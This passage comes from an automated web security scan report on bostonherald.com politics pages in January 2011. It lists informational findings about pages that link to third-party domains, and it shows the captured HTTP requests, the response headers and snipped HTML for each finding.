Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:28:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 58044

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>



   <link rel="alternate" title="Local Politics - News & Opinion - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/news/politics/" type="application/rss+xml">
<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fpolitics%2F&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries </a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_rss_small.gif"> <a class="orange" style="font-weight:bold" href="/rss">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_enews_small.gif"> <a class="orange" style="font-weight:bold" href="/users/register/">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_mobile_small.gif"> <a class="orange" style="font-weight:bold" href="/mobile/info.bg">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_news_tips_small.gif"> <a class="orange" style="font-weight:bold" href="/about/contact/news_tip.bg">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_home_delivery_small.gif"> <a class="orange" style="font-weight:bold" href="/about/home_delivery/">
...[SNIP]...
<a href="/news/politics/view/20110128speaker_deleo_shakes_up_house/"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/fbd318_ltpDeleoA012811.jpg" alt="House Speaker Robert DeLeo is seen in this Tuesday, August 3, 2010 file photo."></a>
...[SNIP]...
<a href="/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/cc02b1_ltpRomneyA012811.jpg" alt="Mitt Romney is seen in this April 23, 2009 file photo in Boston."></a>
...[SNIP]...
<a href="/news/politics/view/20110128jeffrey_perry_rejects_hack_mantle/"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/5e6415_jperry012811.jpg" alt="Jeffrey Perry."></a>
...[SNIP]...
<a href="/news/politics/view/20110127govs_painful_choices_critics_quick_to_pick_apart_305b_budget/"><img src="http://multimedia.heraldinteractive.com/images/20110126/stp/38a71e_gov_01272011.jpg" alt="ON THE CHOPPING BLOCK: Gov. Deval Patrick, right, answers questions about his $30.5B budget as Lt. Gov. Tim Murray looks on at the State House."></a>
...[SNIP]...
<a href="/news/politics/view/20110127lawyer_dimasi_bracing_for_difficult_fight/"><img src="http://multimedia.heraldinteractive.com/images/20110126/stp/5ad244_sal_01272011.jpg" alt="‘GOING ALL THE WAY TO TRIAL’: Former House Speaker Salvatore F. DiMasi leaves U.S. District Court in
Boston yesterday with his wife, Deborah."></a>
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1312541"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/867926_Splash_01282011.jpg" alt="Local Coverage" /></a>
...[SNIP]...
</div>

<iframe style="position: relative; margin-bottom: 16px;" src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html" height="225" width="300" scrolling="no" frameborder="0"/></iframe>
...[SNIP]...
</h1>
                    <img style="width:50px; height:50px; padding:5px; background-color:#ddd; border:none" src="http://cache.heraldinteractive.com/images/siteImages/reporters/howie_carr.gif" alt="Howie Carr" />
                <div class="byline">
...[SNIP]...
<div style="margin:0 0 20px 0; line-height:16px; width:310px">
<img style="float:left; margin:0 5px 0 0; clear:both" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/taxDollars177.gif">
<span class="bold">
...[SNIP]...
<div style="display:none;">
<iframe src="http://www.facebook.com/plugins/activity.php?site=http%253A%252F%252Fbostonherald.com&width=300&height=300&header=true&colorscheme=light&font&border_color" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:300px; height:300px;" allowTransparency="true"></iframe>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

17.284. http://www.bostonherald.com/news/politics/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/politics/view.bg

Issue detail

The page was loaded from a URL containing a query string:

http://www.bostonherald.com/news/politics/view.bg?articleid=1312654

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fpolitics%2Fview%2F20110128mitt_romney_catches_up_with_boston_gop_pols%2Fsrvc%3Dhome%26position%3D5&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://bostonheraldnie.newspaperdirect.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/fontLarge.gif
http://cache.heraldinteractive.com/images/siteImages/icons/fontSmall.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniEmail.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPrint.gif
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/siteImages/reporters/HillaryChabot.jpg?1=1
http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/news/politics/
http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=
http://multimedia.heraldinteractive.com/images/20110127/stp/5eb1a6_mitt_01282011.jpg
http://multimedia.heraldinteractive.com/images/20110128/cc02b1_ltpRomneyA012811.jpg
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://s7.addthis.com/js/200/addthis_widget.js
http://twitter.com/bostonherald
http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html
http://www.addthis.com/bookmark.php?v=20
http://www.bostonheraldineducation.com/
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.massliteracy.org/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.uclick.com/client/boh/sudoc/

Request

GET /news/politics/view.bg?articleid=1312654 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:30:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 42440

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fpolitics%2Fview%2F20110128mitt_romney_catches_up_with_boston_gop_pols%2Fsrvc%3Dhome%26position%3D5&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features">

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>

<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', 'Mitt Romney ‘catches up’ with Boston GOP pols');" onmouseout="addthis_close();" onclick="return addthis_sendto();"><img class="line_icon" src="/images/siteImages/icons/share-icon-16x16.png" width="16" height="16" alt="Bookmark and Share" style="border:0"/>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
<a href="/news/politics/view.bg?articleid=1312654&format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
alt="Comments" />(20) Comments  |  Post / Read Comments</a>
...[SNIP]...
<div id="nextArticleTease" style="display:block">
<img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif"> <b>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<div id="trackPhotoGalleryPicArea"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110128/cc02b1_ltpRomneyA012811.jpg" alt="Mitt Romney is seen in this April 23,..." /></div>
...[SNIP]...
<a href="/track/inside_track/view/20110128we_hear_mitt_romney_david_letterman_andrew_weisblum_and_more/"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/5eb1a6_mitt_01282011.jpg" alt="We Hear: Mitt Romney, David Letterman, Andrew Weisblum and more..." /></a>
...[SNIP]...

<iframe src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html" height="225" width="300" scrolling="no" frameborder="0"/></iframe>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

17.285. http://www.bostonherald.com/news/politics/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/politics/view.bg

Issue detail

The page was loaded from a URL containing a query string:

http://www.bostonherald.com/news/politics/view.bg?articleid=1312665&format=email

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fpolitics%2Fview.bg%3Farticleid%3D1312665%26format%3Demail&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://bostonheraldnie.newspaperdirect.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/fontLarge.gif
http://cache.heraldinteractive.com/images/siteImages/icons/fontSmall.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniEmail.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPrint.gif
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/siteImages/reporters/HillaryChabot.jpg?1=1
http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/news/politics/
http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=
http://multimedia.heraldinteractive.com/images/20110128/fbd318_ltpDeleoA012811.jpg
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://s7.addthis.com/js/200/addthis_widget.js
http://twitter.com/bostonherald
http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html
http://www.addthis.com/bookmark.php?v=20
http://www.bostonheraldineducation.com/
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.massliteracy.org/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.uclick.com/client/boh/sudoc/

Request

GET /news/politics/view.bg?articleid=1312665&format=email HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:31:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 44011

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fpolitics%2Fview.bg%3Farticleid%3D1312665%26format%3Demail&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features">

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>

<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', 'Speaker DeLeo shakes up House');" onmouseout="addthis_close();" onclick="return addthis_sendto();"><img class="line_icon" src="/images/siteImages/icons/share-icon-16x16.png" width="16" height="16" alt="Bookmark and Share" style="border:0"/>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
<a href="/news/politics/view.bg?articleid=1312665&format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
alt="Comments" />(26) Comments  |  Post / Read Comments</a>
...[SNIP]...
<div id="nextArticleTease" style="display:block">
<img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif"> <b>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<div id="trackPhotoGalleryPicArea"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110128/fbd318_ltpDeleoA012811.jpg" alt="House Speaker Robert DeLeo is seen in..." /></div>
...[SNIP]...

<iframe src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html" height="225" width="300" scrolling="no" frameborder="0"/></iframe>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

17.286. http://www.bostonherald.com/news/politics/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/politics/view.bg

Issue detail

The page was loaded from a URL containing a query string:

